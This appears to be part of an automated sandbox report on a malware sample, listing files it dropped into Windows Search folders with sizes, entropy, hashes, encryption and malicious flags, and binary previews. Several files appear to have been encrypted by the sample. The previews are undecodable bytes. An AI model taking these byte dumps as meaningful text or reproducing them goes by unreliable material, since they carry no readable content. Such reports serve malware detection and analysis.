                                                                                                                                                  Preview:..........N ..Cy...li.....F.......^.}..LL"..e...=...<..2h1W...W.v.../.A..........,..xM.......-E.....|..X....f.0`z..Y..Io....C..5k]...T.Id.fK.....a.......l.B.U...{ItAK}d..H..o.x...1v........o../..pV)........FG.....9.".a0/.....o....:...+.>o...%...Q.y....R.R....C....4..*...h,)..Z..U.l97..R..|,....j....W.=.K.U......(..?*(z..B.PX..jY.wF))qB.....d\S..3H..9.ku.8....y.Ep..T*b....k~.E..M'U.n.......;..42..;..w;u.'G$.?..u...K...2..xA.....wq..M...q8..R.g.zP... ......K....!.....N...GL...m.`..g.YpP.l.60o"...1....u.j...J..l.&8.E..n5..e.....\.<.BF..9.z.d..B..x.(La..`P.......R.n..~S.8.?..W;.-^.......I....P..|.....1...j.U..l..*.K...#._...V4.+{.3y.....Hs.w....o........z.e.*T..e.mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{7e55edb2-3bb3-4a5d-8e3d-f1e5ade866d8}\settings.schema

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):496
                                                                                                                                                  Entropy (8bit):7.44830733813923
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:jBBcTVRGcxJXeTMMLPy1D9s/fINMcaSUdNcii9a:jBBi3LxJXe4MLPaYINfZ2bD
                                                                                                                                                  MD5:C5BEC57C13B428EC5D17FFB155F09D4B
                                                                                                                                                  SHA1:08FDF4049FFFC581D5D068F7C129D0BB795BC0D7
                                                                                                                                                  SHA-256:F47D3E5841595660612DFCB15907AAE495C137E72D66BEF7CE1A08C7BCF7BC8F
                                                                                                                                                  SHA-512:8E15CDFE8A4006829C6709D43C6E2780ED2AFC911A5B5A7E804DC89F736D9D9C0D1B9A8AE314C822EF4C7F3F4DA71510440AD1BE1CD71C3424DD800666E17E38
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:Windo#V.l......8.{.G$B;......................Z2....&...?......2>.k...U.g+....9...b..r]1....e$..S.}f..p.#.>.3...%>.....upIZ...p.w}_Wp.....D..sWL."b.3S.O*.#...D5.._..Q`Yq.....m....t....^.I..k".l{.s1.}.U./...D..w..LZ..^......u.6....n..Y...7n.`.7.:y.A.B.@yR..g}_?.u._.U..:Ib .3.$...c.....XB.......ZAL...(Z...8."N)I..(o.Ax..8...x.n$.Z>.S..U.I.\.....%~L..Fn"...|7A&-7b..3....4.K[...x..7.{eP...F.mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{7e55edb2-3bb3-4a5d-8e3d-f1e5ade866d8}\settingsconversions.txt

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):533084
                                                                                                                                                  Entropy (8bit):6.256752946706057
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:6144:lxx++FLLxMhrS0djkg8IX7Rb3uabgb06sVxj8dAB4u2OsfnEa83LGWCAFdkwQkng:PxfHxvKkALbxjiuTsP583eAMwQknzBcJ
                                                                                                                                                  MD5:24B703B5B3B79BB64F8E8BB5E36CD9BA
                                                                                                                                                  SHA1:22FB7B26112A5B72502EC37433807214C276A9D1
                                                                                                                                                  SHA-256:85A3A27902F5209B7DEF03A910219F84B8109C37782314C20E5FE7A1C3D46FD9
                                                                                                                                                  SHA-512:3A53537985A6A6865EF3F99FAC9B6742C994EFC21F42D052D654998DBAFA054E7CD219AD432FDA738112F1602C2646ED6CF73875C5F34352BEF44A8BBF84CC1B
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:marke(z\.AO.gY.7.G).:.i.fC.......o..d..8?&..F.#.....p..t..1$.]...9....5....5.eu...>..7..*".8.v|.[z....3.[U..=n.....z&*...<j...K....Fr..L....f.yCj.2.{5../....q.SAk....e....23v.?........^.0..D....n..e........._.!3.a..1......s...... ....f~5Y..X.F...6*,......O.7.)7S...&.....>...-...7V1.1.0....2Ma..>.&.......D.....T....m...}.U..?.G.n.!.l.I4..E.f..F....,.(.....":...nxoAb<G=_...............>...V..B-..#TS.......I...4.....&Q/.z...:[4W.].....75.Um..Cl.."i*.:.s.../Dk. Q...W..:.....I-^..9...d..Vq....|:.<.(.h.p.....v._..G.......3....&...j[@O(.....,.m{...E.9...&..hQ...\.8..s.p.j[j.5..^...=..~._.3.g.8..'.L..q.....E..y...LR]L.@_..l....4.n?..X.B7(...l.n......?..i.lD.O..........s......../..n..0@LA.....^.&.....^.dss..4..^D..U.....h...........O...h>A.....G.....+.W`.r..P['\c...Z!.......L......."2..8..t.'..6.k....}>'1......_g...*....<_H....W..(x...Nc...L...g7....E7_:..".t.........[..W.!~.[........h.B5.0.}..G.b...WQ5M:".8.(-(...T....g1M...B.!.&@..f..s..T..g

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{7e55edb2-3bb3-4a5d-8e3d-f1e5ade866d8}\settingsglobals.txt

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):44833
                                                                                                                                                  Entropy (8bit):7.99654580218411
                                                                                                                                                  Encrypted:true
                                                                                                                                                  SSDEEP:768:Mj8tkhkMXSI1dsx0zPy+20EW7TxFg99Uisc/4/O6wRENfU2heJizU78RlNF7QO9a:MwokMBsmzJo6Fgp9A/O6x7sJizU70lNy
                                                                                                                                                  MD5:F91FC0EEFE5744E7964383DFDE5DD86A
                                                                                                                                                  SHA1:B92A7157A2E3BBEC148C026D4BDF182AA4D005A3
                                                                                                                                                  SHA-256:E5C2717F53444BE564B56AA8C3E000ABC253C606658BEB40C60A2330C2BB8CA2
                                                                                                                                                  SHA-512:BE3CCA4123199D0853156125057602FFF09EA45EAAD7E91A45495DC341B1F4C712652735261AEAF254BA826D5E3D0D37D9135238ACE9AC1A6F46052D420A1FA7
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:AAA_S}H...{.....^.()mau<hs....6.\...&...VR.7,..D..;.cu%.1..3bJ..p.0..fx..]...&6.?.xx~Gb..%[t......M0G..$.V..*..H.y,,p.0%._-w..^.V.!..&T8....>K}HM.OB.....U@......vDK...I...4..., b..J..V.s-=.g.[.........k7$..%c=.}.e..l....a.I..!..R........m...jm>..s.Y..8.. .....h.q{...T"h.b...x.F.G...I.K!..s...v.7.1..N^9T..u..c.._.eT.zO.0.....=s..r.N.O.[@%`..4K..~.f........@......I..Hv8_%.....L../........"...8.).....iR....'.,...aA........(..gQ...=.Z{....\E..=...O2..cz...Dk...T>1...~Q.m........x..Pd....na.b..C.0m......J...w..`g..64......1`.N....K....5:.\.w.R.."...7\....+6.:N..0.vG0H.-.........7A.m...J?...;VG.&X^.b..M.h[.[...>....G".v...........L...E..t....\.s+..z.].XZW.{...'...m..l..?5_BnW...<.8Qa4..*.^.f.s..+..v......B9Q.80Z......O.f._t]..PQ.`.U.j.\.$.H....J.'.7r...e.....(.R.}..D..m.pR.xp.v$-.#k`.X......i.\.'..D.e..,.2v.N=.(.p.v.r...."Z..q.......-......o.[....L[.kg).>D..P=.....pT....c...H...D.n.<.w.G....D..F..zQSd#........i..R...H.D..|K..Rt...

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{7e55edb2-3bb3-4a5d-8e3d-f1e5ade866d8}\settingssynonyms.txt

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):104051
                                                                                                                                                  Entropy (8bit):7.998295798595591
                                                                                                                                                  Encrypted:true
                                                                                                                                                  SSDEEP:1536:Ze1ACWIo/xU3nso8QMoGLW2a7o4V7KCM7kXV27biv1MC63jhhYRuTYAQnxxBZAU:ZeTWIVMoGS8qDYSv1z63tguTYJnxxBmU
                                                                                                                                                  MD5:7F7251BE74931B240742E18F7071B242
                                                                                                                                                  SHA1:2EBA939E8BF205F7395B5DD5D3AFF405AEDEABD1
                                                                                                                                                  SHA-256:A785B85DB6A0991634F07F17599E6CF6C20200C025D6635372C734C224008DA4
                                                                                                                                                  SHA-512:9934E8CC072BB97D752934EA13665848DBC58B5FBB67C87E1862196CC0398D75296592AC2407D6801CDA7DFBED99B53D0F113E6ED3A6D2F699F619E1E49C2A73
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:*|pri..@.]..E...Y./.~.....L?...'"..../..;.6N.oV^.4.3K....e..'.7.:...m....T.....Q.<.Hy....@!..qp%$...rf.[.iX.".u....}..`..0.......A.tt.b.'......X..7............6.-.......3R."..&`...s..av..A....{`S@H.oy4.....H.A"g.6 b..ha.L...............0.}^.pX....8.b..p......K.2Q_.O..%.;.w.S.Zr...A..J.K....^..x....8.H.\...Y.8.et6...u....k.Dt.NSc.}....._6[J(.YdL.Z...@..F|.J.f.#.....H.!.d.....X....'......TVbH@N.w.$..z.M..7....4..)......V.D....Q...fH.z.2...CC..r...}.......w'K..wr.p...5k.:c.{.....z......<..Ec.....f.:0.k6.N........9...Q.iZ}.q%?..&...\=:5.;.....]N4'.h.K..m.....*V.k..4`.....o..w......2.*-0e..*....G1.*.EVdO(?..T.....k....\.3...!.|.0....s...{.rhM.Z1.g.....u.....].B....S... pw,Y.Z...2...I...\....^..........D.}d6aJ.*\i.^S.\R.a.9...Cl!...C...Qd..#.!.........<.7...$v.......w.D7u..3s..S..X.jH4{...\..&......T.S[.:R...<[.`.P.\OG....a......a.a.sA..?s.(9(ER.B..<.8|.._...m...Y...O.Sj....S .v...I..H..].."..u.sp..>ki.B.6....+fv.s N

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{260db108-6b4d-4d40-b3dd-4a5b75ca2ebe}\0.0.filtertrie.intermediate.txt

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):217852
                                                                                                                                                  Entropy (8bit):7.584241212390776
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3072:q8nNssaG9UnaCVb7vUDcnCmImEAXwA2qVzIxSCfhPiCBjCBsIcq0VRfHHEG011C/:vNsf5lrUInFtzZUjCxc81CdN
                                                                                                                                                  MD5:2C01B254E6A684D7F6F35D39E18687F6
                                                                                                                                                  SHA1:81F51DD81A669B55F15DAB8240CB1A2AF04CCCE3
                                                                                                                                                  SHA-256:3790360ECD3B251E095D2898481620AD65E9F761C564DAAF6DC115307FA2784F
                                                                                                                                                  SHA-512:B16180DCC849CFE2872A61D514C390521B0E274942A1744DD56C0288CE081FEE4C416FB2700F070BD27D31C76726B31426F82B4E9D23752B6B2F0E3A3D60939E
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:0.0....@....F.:nu}C>.|...1..df.-.+m~.....7.......W.O,g-,..7...#.08.D.+0yy..)1.[7(.._]~.6-W.(.Z1Uq]..'.g..u...*V..x...z.......^...m[.A..1....[].X.D)..R...%...+.*.."<..K...x..S....>...?m...o.SkG.....O0.|.&..T..].....Bh<d:....P..M.....er.....f..2..........(..i....P..\>4..7G.H"...v....AY.;b54o!.#.7.=Ez#.[.#.G.....6.<u7Ur8q7..b..^..ic..V~3..XJ.Q.;..U=P....E.<1K.......@._$<W..Q.k..g.n.e=..<.....o..a.._*..c..~.....u"%.M........:.o..:..?.......4.....X.ej....K.>.{....?.:.j.o.@.$gc5..e.._..\x......L..A...&....)q..yZ..B:QF{Lb!.b.8.5..R..1.;aRU'+......0.....A.........M+ye..{.......q1.....E.Vv6rC.x.J.T..h...).....KZ...x^6..H..[:.H..C.|1..[R..o(.....9;.1/.MM.7R...Y.>......W.`...#..M..q...19g...O.&........4...EB..J...P%e....DX..v....BGv.q...WIa.@)..u,.q..L...........v.K....>no8w...T..M.....m..5..T.+....A.0...,.@.........c.{....G3.qi.P..a.@P.(.R0.T...B..$....-\...d''.d...3.]..w...U..k....#...."..p...N.5...6..S..]o+W...T......Dj.....<.CS.J.Y.P..!.r;}.#Q._.(..gu=i...

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{260db108-6b4d-4d40-b3dd-4a5b75ca2ebe}\Settings.ft

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):239538
                                                                                                                                                  Entropy (8bit):7.35147074571251
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3072:hPpMX/L5/4XrcnXpTLTjYzfamPEetZ+Xyt9zpcC9ECNEFME3by/pcU7a:ov94boZTLgznEetZuw9zGCNc
                                                                                                                                                  MD5:9FA2C7E568F333355627711F6A8C4DB8
                                                                                                                                                  SHA1:1FC1D5AE3AEE0A9A5C5AF83B718768D263075FF9
                                                                                                                                                  SHA-256:B17ED9ADF8AE4735AAFC6EC0F07BBD6A7D8A5F8E3C0BC87E6CB96B1C38ECB1AC
                                                                                                                                                  SHA-512:5D6BBFA1722071B35E61C67ED86D0583F66AD7EB7C762BE53709293640853F3AABB71B284D573EF681A8AE7172B9874E5A9105460B605A97E4859A85B39BF4C5
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:.....5...h.>..].y...8..cS.&.B...8..)...`..L.,..T.lH.....Y..7raMm.&.x.45....#K.U..M..T2.....P9.0....b.+&.5{..0x..u@ .....p.0...*....d.".VXl.K...8.z.E...._..0t]..EW.H.4....K..|4..(}........q..2....Z:....^|...Z..d.>{..S._p.W\..c..@..=EI.......gZ......G-.(q...(..;...6......p-.\..51L%...DC.!3.g.uk..Wj..j].......D4...8.....v...4)m.$, ..U..2.V.!....'xn..[o.{.6...p.x~.rLE"....h.n?..w........m{.(.........%.(.FG..t...v.|.S.......~..N.....bT.td.M..O.......!k?wj....u.<~..7.I7.I.&M.<...Ct.x...i.Pl7..U..m_...f.....QB...;.#N...UX ...rpXlB.......W3|v.f...P...../XY"...P.50.qS2zR.]...........................].$....x+.X....6..+.e.r..t.R.8.t.s#m..7f....4...b.j.;...`.H..$.=.J...!....I..........jO......&.D>.V0.....aH.!....t..m?.. .5X.k.....M.dY.~v....q..)D ....b....,".i..b#.......b..&5$]..;+`.P.vS.W.}....E;........s..Y...+vXf/.zse.U..6.7.W.7.8AiS...9.3.R.+e....w....K.11QW.b......M..p.D...5. .?.X...d.......ly................Hm.?....qc4s...r..<!..9.

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{260db108-6b4d-4d40-b3dd-4a5b75ca2ebe}\Settings.index

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1482186
                                                                                                                                                  Entropy (8bit):5.659079827135827
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:iSCdG01A4ujt6az+F3jv8COuZ/kr2bEEYz1jBa/mqkNRM3lVKSuB:H8zICF8hR3z1rM3lVKSuB
                                                                                                                                                  MD5:8D6CA08706D59003E232B05BCBFBCBA4
                                                                                                                                                  SHA1:BDAF73599C4772D4A75B9EDD4A2F19751CBEAACF
                                                                                                                                                  SHA-256:2D3D520E001FA6D06DD7A06FBD7E0E6E30BE5ABBB6C934E4C657F55EDB1A5B00
                                                                                                                                                  SHA-512:4AD05A28594E1527E0833B5983707235E0734376B4BB2902A65CD1C29A4163C3FD8D7E8CFC5E14E699471CFEDC4CC56CC9D6E088BF9360DF554057C5C92488B6
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:Ej..D.......T.$..Z.6...K(t9K..v=..(..1.^..l..'..g...........0.l..'......h.*ppz..a>.BO.....Itz...{@s.f....#C....S..l..<.....u..#.....)2.%.....8...C.7..'|..B..m.....m..e.R..{.l...,O~...2.E`.N..?.61N`.l...k..7."...u#.&JP..=.....]....$...........+B...ZVX.yE..4..'e....$.6..n..u{Uw.h'9..qbF..g.\.u...|_..;.......@.;j.CS.].....0F......7?..)..gv};.....VdME..1.C...F..[-...8N.\v....1Gp.....Qu......-....U..2.....J...$.nS.D).S.A..p+[W.E_.>....k."..i......f.mE.X....uH...i.^.X..U....e,..M...:|.5......zNS8O......Q.K.Y.o.$..F..'...X.-ZK....!..#..&.W..`d.R.....39..h..r...G..B..JN....N..(.42Il....F.9.l+..C.@....:..A.`.n....3X....3.9a|.hY.P.o~...`..1B/i5.U-.h6.&.Z.0.kZdPB..=;i..g`......N~....dM....6....b....}Mq...B.X0#HA.o.l...)..%*.O._?.-....I.....6....s..N....H.:+....cg-.,.|)s...Vl.G...c......KP...J.mW.0>........o)).0F.9..]....~bK.i.1.....A)...#,K...h4O...#....4H..*..4.1.,WD...gG..W....N.v...c.t............n$....n.s.t.qf.2^.G./..1v@.n.2.T.*(

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{44257e36-ae79-46be-a539-cf0cb39c677f}\0.0.filtertrie.intermediate.txt

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):217852
                                                                                                                                                  Entropy (8bit):7.583332257201943
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:6144:kUoCkLDnEPtd9HJQFmhIiDy/jCxc81Cdi:kUDanEgaI0yA
                                                                                                                                                  MD5:92B915D1C0B56D8E69615A7B5001422E
                                                                                                                                                  SHA1:1339CBF7C04B2B338D97258ACE2CD0FDFBCBF424
                                                                                                                                                  SHA-256:6AA42EFBF981287268C9535BB37B348A0222F9DCF6069316539C9204783D064F
                                                                                                                                                  SHA-512:70B26D166B3FA7712C9647BA9AF929DA0DD178B00C6E06E0B4F3E83289BE48C778937095F507DFEBA2D20F79ABA03BE8D89A9E47960D48B8A174594253FF2830
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:0.0....C._..:..ag.59.s*?.......U.....IW.].z5[...sK<..I.....6P...0.....M>5.N...+...q...@.#......Tw.b...m..[.)5.O...{.*.z....#.".+...L..y.....1..]..y.S..,;.d{+?c-.P|.7..A.R7.i...6..o....s...4.. .........|.C\.u...n..D..(#..^..h>..8.../......-...zn.tL|.tTn.fc.v. ./......Mw..,....Ma.3..f..T.3"..M8.6.v$...... ...J.z..g.....[vw`j`.qH....>...5t..4...w.....`....o............ja.AI.."2...b%..i.h.h.....1.Z.m...).........l#.qG..a.......y.>b...L9.....R.0....$18...8<T....QK...D#...G~.k_.!...mM=,..!..."x<...1g..J..v.M..Y.r...ruO.[.....j&.D...t?d...q.\c..1..2.L ..#o>....U....r..iW..p7D......SiS@ft?..6.s.....|C.j.m\..Ug..NW.........R....-8..NF.....o......E.^.#.NF...q@.b..{^.^..qJ...!.vn...h...|;....v....L.M.".AD&'.r..o..q....h..e".O..P...l.7.y.T@|...cI..J...W.%~.42..I.{p..............d..Ce-...;y..S....B..ZuC=d]..*.%...0.....V....<F..E....uE.....Cj;..5..m..U......_.[..C.:O.YV}.-;..T....t<tX...9w..>.]...........Q.K'.9pQ..f...r&Ds|....|]....9N./.{*z..M...J.r....j^.

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{44257e36-ae79-46be-a539-cf0cb39c677f}\Settings.ft

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):239538
                                                                                                                                                  Entropy (8bit):7.352070764439283
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3072:hjrK/go8IP85fiHcM3y7b+EalX47AGCaSfeNbetDKN5ZUOcC9ECNEFME3by/pcUg:hXK/go8IP8hpM3ysiSfSeMjWtCNG
                                                                                                                                                  MD5:19C576192D36C7CAF89A1ED8F71BA262
                                                                                                                                                  SHA1:56E7783ADE68673A4462DF92209AFBA31BD054AC
                                                                                                                                                  SHA-256:B22DE9BD239969A0CD65371D29D99FA72565A29631D9CF813978D9DBC4E57F86
                                                                                                                                                  SHA-512:A60D4BA72CE23A35C0C9FAD669F04CC18BDF1063455962518797BA90E41095C275970F6E71F5064B8428059085916C3D53F5BF59C66565C97C6A52F723E100D3
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:...../\R.T.....7.Vg..B2,4j.....-..x...(.js....JU..d.Q*......h#.K>p...cd..g...6m.....1a.S9..k...*Y_...........9..O..S. .?.5.i.&.h.w.9........u..-..........Yp..)...c...P......ase..x....C...X...|..p..@`^.SZ......E....mO......;...).@....D..../...6......y..y....X.F...u..N`.~|pHB....YS.X-.;..A.w.XAj.x........l.......}.!y..L...v$".l]|.......{...l....x.p^.f....5.3E........RW.d.k.|N2.Qp...%...;...z..1.Q....[.....]....W5d&V...31....+&7...g.......W.......).SRV0.G..F.Ka.d.5.3..Kg7..D.90sN....Z....c.....Ik.P.>..&f......m.n. ....;.!V...V./k..v>f.[....g.>.H}..F.:$..=....&...,Z...Yj8..<b.nF....L....'(.K..@.C.....Up..jD.... .-8....c.H+YG:.'..Pp...fu.i....Y.=.h@.".^Ie...e..290.m...<...z"..rB.......n..y...}..j..^e*t.g..^&.<...{N..%......dy.Q....w..".W.F...c...W..jx..F...3...7...~.5..Hf]0..#b(m8....M]T.}...m.q...4K..k.E...0.r....c._.$Yc.....{%.....p.#o...Aqd.-...3..".;z.Pq...m.'..'n2hn.@...f@.K.`v{...@m3...D.......iMN.W..O2r....y:>...=..r....~.3U.F.>z..A...

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{44257e36-ae79-46be-a539-cf0cb39c677f}\Settings.index

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1482186
                                                                                                                                                  Entropy (8bit):5.658638754422011
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:hAFsZxdDKjt6az+F3jv8COuZ/kr2bEEYz1jBa/mqkNRM3lVKSuO:hAFsz1sCF8hR3z1rM3lVKSuO
                                                                                                                                                  MD5:CA3A2727A97C746F3547D559FDABA531
                                                                                                                                                  SHA1:B5C9382C0C8BAA8F69A2C7B6C9D95254D709B98E
                                                                                                                                                  SHA-256:8DAA2060D8EE21972B9BFF4AA58527ECE4598846B5F0F4507329415EE9520779
                                                                                                                                                  SHA-512:3D8D6FACB6AB39C163EDA9BADA70FBD5891B75324B591A86CB9D08AE7F267BCCE658ADA34712707834BD2636235304EC65FAA3C78B94F0F3D621E246B0863896
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:Ej..D.v..../.7izj.*J.8.g.y|..7/G.re.1..*[4A.........n......m.....d]hu.t.J..|#...E....."....:U1.g)(..z...v.J..U8...qm...!..lz..y..:w...LF........{..FJ...P]........u.n.......S.\ej.C.8.3.hM7....W.dMrF].[:...o.....N.....'..\._=.<......P'..k...z'.(......'...mR.7.[...".....4....cB.U...a.U.M..[e.5 .aF&.....*....w.5.8...b.....-...-...8.f.\.d.....%V\.:.....<a....../u.I......^..)..}0........w.7..t..l..}.mM.j;.$9......f..{.x..+..~B....J&....O...i.......}.9...w&...t,.%.ZJg.....z..n ..IM....Q..IM.......V3..x.#.....<OS.....;..-q.?...2A...p_...2..].-fZm.I9.....&.~t.a.L.....".../...d..C.a..B....q...5?.[.s.../....^t....*xX..M1>..J..z.%U......\Vy..{ ...p...J..5{...D1.R`0u....5m..>..+..4...Q<.,..@...l.G.S....../.."#...H.._..\5..Yf'v.$....3a....s.!..y'.T........%%m.bw..Xb........Z..k.Y...Z..h.@.]....-.....y.......>..^.\r........w|.Wo....a...W3...6....C..7V.T...R5v.RD..~a~..O..?.f.9...m......2..ZM.X.....q..~..a....<....C..:IS.......pZU.ap.%'.1#$.U......

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409769661005548.txt

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):102814
                                                                                                                                                  Entropy (8bit):7.998500231731718
                                                                                                                                                  Encrypted:true
                                                                                                                                                  SSDEEP:1536:o7cMaCDV6/lcghH7VJyZVMSFdjYcfg1wbqP9YF3y3bTE0rpyU3BvWBRsYc0fN7sj:ccMbilFHZkHMSRiIifEsXxqzc0fRsZx
                                                                                                                                                  MD5:3274D22A9DC0753170628D5D47FB812D
                                                                                                                                                  SHA1:17F175BD18CBB0D33F8AFBF02922676697341904
                                                                                                                                                  SHA-256:A5357436ADF0E79C8448F0ADCF6BF1DB8E5D40439A5F286EDC71719DC206ADB5
                                                                                                                                                  SHA-512:92FAABE75F349160E106CBCA267EBE05BEA477ADA60573318E3472453A8D384D38AC3100C727DE6F2E623D85445E3762C9A9734A6C274C10FAC4E3460468860A
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:[{"SyL.]..Qn.W..A...eu.<.....y..W........H...0l7".i....b[.:.e.lN.$y.h.7...,...../.T.j.%....O...7.p.-w.5.Dn.S.q.......<....X...>.Y..-.7gRB.).KJ.V].}{....w%.....((...S\uES..Y.n.m.. :..A..M...[.....>...0+....{.am.*a...w^.[k.:.p....]..+.g...(Q........S5.7..u.../Y..9G{g..+.*..0....c@....u...\.....yu..,|T..0.D.g.....Z..fMN.......{.KV...2=$1-..L...QR.R.O.a.A=...}........t.....t..h.\.D2l...n......,V...|.....f.T_Q.T..=.`.=..c...N..`..U|.....4...@..ad..>.....P......4.._p(.h.}...t..EvW......d...=..^]..d....u..W,~@......*8a".r:....h+...q.NI.;..>.....P]..s..".,...|...(F@..x..z...4.%!0.4P.[...6V][.X/s...w....G.-./.......!.Ob.*.iu..~j.0.:.\.H1e.....F(.)....Y.....:...W.^.......)6.G(T..3 ..`....K.....b[Lq....l..5..."...`.4..G.w....a...A..azkX(^..:.h.c...V.2p..z..z....{EG.#./....9....Z...-k......,.?...ci.:.....)[.j... `I..{.=..*..j........>.O.z]g..1N...._.Q..`..u</..U.b. .#...^.xb....._.V..3.E.L....?O.P. ......?g...9$ .~.`..1.J..Z.......J(....M.9.6.

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409769902033656.txt

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):104124
                                                                                                                                                  Entropy (8bit):7.9984024596043986
                                                                                                                                                  Encrypted:true
                                                                                                                                                  SSDEEP:3072:5sBR40pG3NDC1rImABvRgW1oL/gXTW+5LEdvD:aBC0UmkRMuW+10D
                                                                                                                                                  MD5:28D431F968A78B37081EE7E65C9F8DF2
                                                                                                                                                  SHA1:54142A6E10C6A7FEDA1D11746F43B20C85DAF519
                                                                                                                                                  SHA-256:1384DF47D791B70BB926D7D059D35CF71C522E0759DC73911991019986B76E6D
                                                                                                                                                  SHA-512:EDEAB79CD8745E5C9966CCDD58605C0999D79794A876578F924F10E710C62254E6E9ED527C602EC996BEB1424DA1F7BFC4958420DFD2C59F9225B7CB4EB79BAF
                                                                                                                                                  Malicious:true
